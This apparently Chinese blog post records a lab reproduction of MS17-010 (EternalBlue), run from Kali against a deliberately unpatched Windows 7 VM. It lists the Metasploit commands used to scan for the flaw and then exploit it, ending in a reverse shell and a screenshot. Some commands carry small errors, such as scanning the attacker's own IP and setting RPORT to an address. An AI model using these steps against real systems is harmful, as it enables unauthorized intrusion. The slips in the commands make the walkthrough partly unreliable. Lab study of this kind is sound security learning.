MSF ms17-010复现

发表于2023-10-07|更新于2025-03-20|网络安全

|浏览量:

渗透流程

环境准备

使用vm
靶机 windows7 2019.1 sp1 ==192.168.123.146==
攻击机 kali 2023 amd64 ==192.168.123.236==
win7 关闭所有防火墙，删除所有补丁，保证未处于公共网络

image|500

Nmap 扫描靶机## MSF ms17-010复现

正文内容

namp 192.168.123.236

image|500

发现445端口，smb服务开启，判断可能有永恒之蓝（ms17-010）漏洞

MSF攻击

进入MSF，并且查找ms17-010相关脚本

msfconsole

image|500

image|500

search ms17-010

image|500

探测是否容易受到ms17-010攻击

use 3
show options

image|500

填入靶机ip
set RPORT 192.168.123.236

image|500

开始探测
run

image|500

扫描结果显示容易受到攻击，判断存在漏洞

正式攻击

回到脚本选择界面

image|500

image|500

use 0
show options
这里同样只需要设置RHOST靶机ip
payload选择默认的反弹shell即可

image|500

run

image|500

连接建立，shell反弹成功

image|500

截图
screenshot

image|500

image|500

image|500

文章作者: pan0624

文章链接: https://blog.pan0624.top/2023/10/07/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/MSF%20ms17-010%E5%A4%8D%E7%8E%B0/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 pan0624的博客！

网络安全 MSF 渗透

相关推荐

课程报告: CSRF攻击技术及其实现1. 简介跨站请求伪造 (Cross-Site Request Forgery, CSRF) 是一种网络安全攻击，攻击者通过伪造受信任用户的请求，执行未授权的操作。它利用了用户在已认证会话中不当保护的漏洞，诱使用户在不知情的情况下执行某些动作，从而达到攻击目的。 2. CSRF 攻击原理CSRF 攻击利用了受害者在已认证状态下的身份。主要流程如下：受害者登录到受信任网站（如银行网站），并产生一个有效的会话 cookie。攻击者诱使受害者访问一个包含恶意请求的网页。受害者访问该恶意网页时，网页中的恶意代码会自动发送一个请求到受信任网站。由于受害者已登录，浏览器会自动附加会话 cookie，因此该请求将以受害者的身份执行。受信任网站认为这是合法的请求，并执行请求中的操作，如转账、修改设置等。 3. CSRF 攻击的类型 GET 请求的 CSRF 攻击：通过包含恶意 URL 的图像、超链接等来触发。 POST 请求的 CSRF 攻击：通过隐藏表单和自动提交脚本来实现。 4. CSRF 攻击的实现下面是一个简单的 CSRF...